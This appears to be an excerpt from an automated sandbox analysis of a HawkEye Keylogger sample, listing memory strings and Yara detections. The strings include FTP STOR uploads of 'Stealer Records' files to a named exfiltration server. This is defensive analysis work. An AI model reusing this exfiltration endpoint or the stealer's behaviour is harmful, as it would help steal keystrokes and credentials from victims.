Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmp	String found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt0wVl
Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmp	String found in binary or memory: mHSTOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366093376.0000000002AD4000.00000004.00000001.sdmp	String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp	String found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp	String found in binary or memory: mWftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp	String found in binary or memory: ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp	String found in binary or memory: m]ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_783875%207.28.2021%205:26:06%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp	String found in binary or memory: m&HawkEye_Keylogger_Execution_Confirmed_
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp	String found in binary or memory: m"HawkEye_Keylogger_Stealer_Records_
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

Yara detected HawkEye Keylogger

Source: Yara match	File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR